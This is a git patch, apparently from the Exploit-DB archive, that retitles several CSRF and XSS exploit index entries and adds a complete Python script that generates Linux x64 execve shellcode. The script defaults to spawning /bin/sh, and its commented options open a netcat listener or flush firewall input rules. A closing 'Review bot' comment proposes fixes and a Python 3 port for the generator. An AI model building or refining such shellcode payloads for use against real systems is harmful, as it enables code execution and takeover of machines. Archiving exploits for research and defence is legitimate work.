From 3339727aed634716d142fa6eea3117542aedc8f0 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 12 Apr 2018 05:01:47 +0000
Subject: [PATCH] DB: 2018-04-12
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
2 changes to exploits/shellcodes
Cobub Razor 0.7.2 - Cross Site Request Forgery
WolfCMS 0.8.3.1 - Cross Site Request Forgery
Cobub Razor 0.7.2 - Cross-Site Request Forgery
WolfCMS 0.8.3.1 - Cross-Site Request Forgery
KYOCERA Net Admin 3.4 - Cross Site Request Forgery - Add Admin Exploit
KYOCERA Net Admin 3.4 - Cross-Site Request Forgery (Add Admin)
iScripts SonicBB 1.0 - Reflected Cross-Site Scripting
iScripts SonicBB 1.0 - Reflected Cross-Site Scripting (PoC)
Wordpress Plugin Activity Log 2.4.0 - Stored Cross Site Scripting
WUZHI CMS 4.1.0 - ‘Add Admin Account’ Cross-Site Request Forgery
WUZHI CMS 4.1.0 - ‘Add User Account’ Cross-Site Request Forgery
Wordpress Plugin Activity Log 2.4.0 - Stored Cross-Site Scripting
WUZHI CMS 4.1.0 - Cross-Site Request Forgery (Add Admin User)
WUZHI CMS 4.1.0 - Cross-Site Request Forgery (Add User)
WordPress File Upload Plugin 4.3.2 - Stored Cross Site Scripting
WordPress Plugin WordPress File Upload 4.3.3 - Stored XSS
WordPress Plugin File Upload 4.3.2 - Stored Cross-Site Scripting
WordPress Plugin File Upload 4.3.3 - Stored Cross-Site Scripting (PoC)
Linux/x64 - x64 Assembly Shellcode (Generator)
---
 exploits/php/webapps/44418.txt | 2 +-
 files_exploits.csv | 18 +++---
 files_shellcodes.csv | 1 +
 shellcodes/generator/44445.py | 96 ++++++++++++++++++++++++++++++++++
 4 files changed, 107 insertions(+), 10 deletions(-)
 create mode 100755 shellcodes/generator/44445.py
diff --git a/exploits/php/webapps/44418.txt b/exploits/php/webapps/44418.txt
index 5ae8edce3..94af94665 100644
--- a/exploits/php/webapps/44418.txt
+++ b/exploits/php/webapps/44418.txt
@@ -8,7 +8,7 @@
 # Author Blog : http://nullnews.in
 # Vendor Homepage: http://www.wolfcms.org
 # Software Link:
-https://bitbucket.org/wolfcms/wolf-cms-downloads/downloads/wolfcms-0.8.3.1.zip
+
 # Affected Version: 0.8.3.1
 # Category: WebApps
 # Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686
diff --git a/files_exploits.csv b/files_exploits.csv
index 36eb432f3..748b2e346 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -39120,8 +39120,8 @@ id,file,description,date,author,type,platform,port
 44408,exploits/php/webapps/44408.txt,"GetSimple CMS 3.3.13 - Cross-Site Scripting",2018-04-05,"Sureshbabu Narvaneni",webapps,php,
 44413,exploits/hardware/webapps/44413.txt,"FiberHome VDSL2 Modem HG 150-UB - Authentication Bypass",2018-04-06,"Noman Riffat",webapps,hardware,
 44414,exploits/windows/webapps/44414.txt,"DotNetNuke DNNarticle Module 11 - Directory Traversal",2018-04-06,"Esmaeil Rahimian",webapps,windows,
-44416,exploits/php/webapps/44416.txt,"Cobub Razor 0.7.2 - Cross Site Request Forgery",2018-04-06,ppb,webapps,php,
-44418,exploits/php/webapps/44418.txt,"WolfCMS 0.8.3.1 - Cross Site Request Forgery",2018-04-09,"Sureshbabu Narvaneni",webapps,php,
+44416,exploits/php/webapps/44416.txt,"Cobub Razor 0.7.2 - Cross-Site Request Forgery",2018-04-06,ppb,webapps,php,
+44418,exploits/php/webapps/44418.txt,"WolfCMS 0.8.3.1 - Cross-Site Request Forgery",2018-04-09,"Sureshbabu Narvaneni",webapps,php,
 44419,exploits/php/webapps/44419.txt,"Cobub Razor 0.7.2 - Add New Superuser Account",2018-04-09,ppb,webapps,php,
 44420,exploits/php/webapps/44420.txt,"MyBB Plugin Recent Threads On Index - Cross-Site Scripting",2018-04-09,Perileos,webapps,php,
 44421,exploits/php/webapps/44421.txt,"WolfCMS 0.8.3.1 - Open Redirection",2018-04-09,"Sureshbabu Narvaneni",webapps,php,80
@@ -39129,15 +39129,15 @@ id,file,description,date,author,type,platform,port
 44425,exploits/php/webapps/44425.txt,"WordPress Plugin Simple Fields 0.2 - 0.3.5 - Local/Remote File Inclusion / Remote Code Execution",2018-04-09,"Graeme Robinson",webapps,php,80
 44429,exploits/json/webapps/44429.txt,"CyberArk Password Vault Web Access < 9.9.5 / < 9.10 / 10.1 - Remote Code Execution",2018-04-09,"RedTeam Pentesting",webapps,json,
 44430,exploits/linux/webapps/44430.txt,"KYOCERA Multi-Set Template Editor 3.4 - Out-Of-Band XML External Entity Injection",2018-04-09,LiquidWorm,webapps,linux,
-44431,exploits/linux/webapps/44431.txt,"KYOCERA Net Admin 3.4 - Cross Site Request Forgery - Add Admin Exploit",2018-04-09,LiquidWorm,webapps,linux,
+44431,exploits/linux/webapps/44431.txt,"KYOCERA Net Admin 3.4 - Cross-Site Request Forgery (Add Admin)",2018-04-09,LiquidWorm,webapps,linux,
 44432,exploits/php/webapps/44432.txt,"Buddypress Xprofile Custom Fields Type 2.6.3 - Remote Code Execution",2018-04-09,"Lenon Leite",webapps,php,
 44433,exploits/php/webapps/44433.txt,"WooCommerce CSV-Importer-Plugin 3.3.6 - Remote Code Execution",2018-04-09,"Lenon Leite",webapps,php,
-44434,exploits/php/webapps/44434.txt,"iScripts SonicBB 1.0 - Reflected Cross-Site Scripting",2018-04-09,ManhNho,webapps,php,
+44434,exploits/php/webapps/44434.txt,"iScripts SonicBB 1.0 - Reflected Cross-Site Scripting (PoC)",2018-04-09,ManhNho,webapps,php,
 44435,exploits/php/webapps/44435.txt,"WordPress Plugin Google Drive 2.2 - Remote Code Execution",2018-04-09,"Lenon Leite",webapps,php,
 44436,exploits/php/webapps/44436.txt,"iScripts Easycreate 3.2.1 - Stored Cross-Site Scripting",2018-04-10,ManhNho,webapps,php,
-44437,exploits/php/webapps/44437.txt,"Wordpress Plugin Activity Log 2.4.0 - Stored Cross Site Scripting",2018-04-10,"Stefan Broeder",webapps,php,
-44439,exploits/php/webapps/44439.txt,"WUZHI CMS 4.1.0 - ‘Add Admin Account’ Cross-Site Request Forgery",2018-04-10,taoge,webapps,php,
-44440,exploits/php/webapps/44440.txt,"WUZHI CMS 4.1.0 - ‘Add User Account’ Cross-Site Request Forgery",2018-04-10,taoge,webapps,php,
+44437,exploits/php/webapps/44437.txt,"Wordpress Plugin Activity Log 2.4.0 - Stored Cross-Site Scripting",2018-04-10,"Stefan Broeder",webapps,php,
+44439,exploits/php/webapps/44439.txt,"WUZHI CMS 4.1.0 - Cross-Site Request Forgery (Add Admin User)",2018-04-10,taoge,webapps,php,
+44440,exploits/php/webapps/44440.txt,"WUZHI CMS 4.1.0 - Cross-Site Request Forgery (Add User)",2018-04-10,taoge,webapps,php,
 44441,exploits/linux/webapps/44441.txt,"Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager - Invalid Access Control",2018-04-10,SlidingWindow,webapps,linux,
-44443,exploits/php/webapps/44443.txt,"WordPress File Upload Plugin 4.3.2 - Stored Cross Site Scripting",2018-04-10,ManhNho,webapps,php,
-44444,exploits/php/webapps/44444.txt,"WordPress Plugin WordPress File Upload 4.3.3 - Stored XSS",2018-04-10,ManhNho,webapps,php,
+44443,exploits/php/webapps/44443.txt,"WordPress Plugin File Upload 4.3.2 - Stored Cross-Site Scripting",2018-04-10,ManhNho,webapps,php,
+44444,exploits/php/webapps/44444.txt,"WordPress Plugin File Upload 4.3.3 - Stored Cross-Site Scripting (PoC)",2018-04-10,ManhNho,webapps,php,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 0b0cbac92..0634f8535 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -873,3 +873,4 @@ id,file,description,date,author,type,platform
 43463,shellcodes/linux_x86/43463.nasm,"Linux/x86 - chmod 777 /etc/sudoers Shellcode (36 bytes)",2018-01-04,"Hashim Jawad",shellcode,linux_x86
 44321,shellcodes/linux_x86/44321.c,"Linux/x86 - execve(/bin/sh) Shellcode (18 bytes)",2018-03-20,"Anurag Srivastava",shellcode,linux_x86
 44334,shellcodes/linux_x86/44334.c,"Linux/x86 - EggHunter + Null-Free Shellcode (11 Bytes)",2018-03-23,"Anurag Srivastava",shellcode,linux_x86
+44445,shellcodes/generator/44445.py,"Linux/x64 - x64 Assembly Shellcode (Generator)",2018-04-11,0x4ndr3,shellcode,generator
diff --git a/shellcodes/generator/44445.py b/shellcodes/generator/44445.py
new file mode 100755
index 000000000..081b6950f
--- /dev/null
+++ b/shellcodes/generator/44445.py
@@ -0,0 +1,96 @@ +#!/usr/bin/env python +# +# Features: +# - Linux shellcode x64 assembly code generation +# - stack based (smaller payload size) +# - execve based +# - supports long commands (meaning bigger than an x64 register - 64 bits) +# - supports long parameters (meaning bigger than an x64 register - 64 bits) +# - one command only (execve will alter the current memory proc and when it exits there's no continuation) +# - supports command with up to 8 parameters +# +# Instructions +# - requires full path to the command +# - only one command is supported due to execve transforming the current process into a new one, loosing all previous context (any other instructions that would have been executed) +# - after having the x64 generated assembly code: +# - copy paste it into a file (in a Linux environment) - example.nasm +# - execute: +# nasm -felf64 example.nasm -o example.o && ld example.o -o example +# +# Author: Andre Lima @0x4ndr3 +# https://pentesterslife.blog +# +######## + +command = "/bin/sh" +#command = "/sbin/iptables -F INPUT" +#command = "/bin/nc -lvp 3000" +#command = "/bin/echo 1 2 3 4 5 6 7 longparamparamparam" + +def tohex(val, nbits): + return hex((val + (1 << nbits)) % (1 << nbits)) + +code = "" +code += "global _start\n" +code += "section .text\n" +code += "\n" +code += "_start:\n" +code += "push 59\n" +code += "pop rax\n" +code += "cdq\n" +code += "push rdx\n" + +params = command.split(' ') +try: + params.remove('') # in case of multiple spaces in between params in the command - cleanup +except: # it throws an exception if it doesn't finds one + pass + +if len(params[0]) % 8 != 0: + command = "/"*(8-len(params[0])%8) + params[0] + +iters = len(command)/8 - 1 +while iters >= 0: + block = command[iters*8:iters*8+8] + code += "mov rbx, 0x" + block[::-1].encode("hex") + "\n" + code += "push rbx\n" + iters -= 1 + +code += "push rsp\n" +code += "pop rdi\n" + +aux_regs = ["r8","r9","r10","r11","r12","r13","r14","r15"] +i = 0 +params = params[1:] # 
remove first element - command itself. we just want the params +if len(params) > len(aux_regs): + print "More than " + str(len(aux_regs)) + " parameters... Unsupported." + exit(1) +for p in params: + code += "push rdx\n" + if len(p) % 8 != 0: + p += "\x00"*(8-len(p)%8) + iters = len(p)/8 -1 + while iters >= 0: # each param + block = p[iters*8:iters*8+8] + code += "mov rbx, 0x" + tohex(~int(block[::-1].encode("hex"),16),64)[2:2+16] + "\n" + code += "not rbx\n" + code += "push rbx\n" + iters -= 1 + code += "push rsp\n" + code += "pop " + aux_regs[i] + "\n" + i += 1 + +code += "push rdx\n" +code += "push rsp\n" +code += "pop rdx\n" + +while i>0: + i -= 1 + code += "push " + aux_regs[i] + "\n" + +code += "push rdi\n" +code += "push rsp\n" +code += "pop rsi\n" +code += "syscall\n" + +print code \ No newline at end of file
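Review bot: The parameter cleanup at `params.remove('')` drops only the first empty token, so a command with a leading space or three or more consecutive spaces still carries `''` entries into the parameter loop, and each one is emitted as an extra empty-string argv entry (an all-`\x00` block pushed through the `not rbx` path) instead of being skipped. Replacing the whole try/except with `params = [p for p in command.split(' ') if p]` removes every empty token and drops the bare `except:` at the same time. Separately, the script is Python 2 only as written (`print` statement, `str.encode("hex")`, and `len(command)/8` relying on integer division), so it fails under a current default `python`; if that matters, `binascii.hexlify(...)` and `//` are the minimal changes, and the shebang could name `python2` until then.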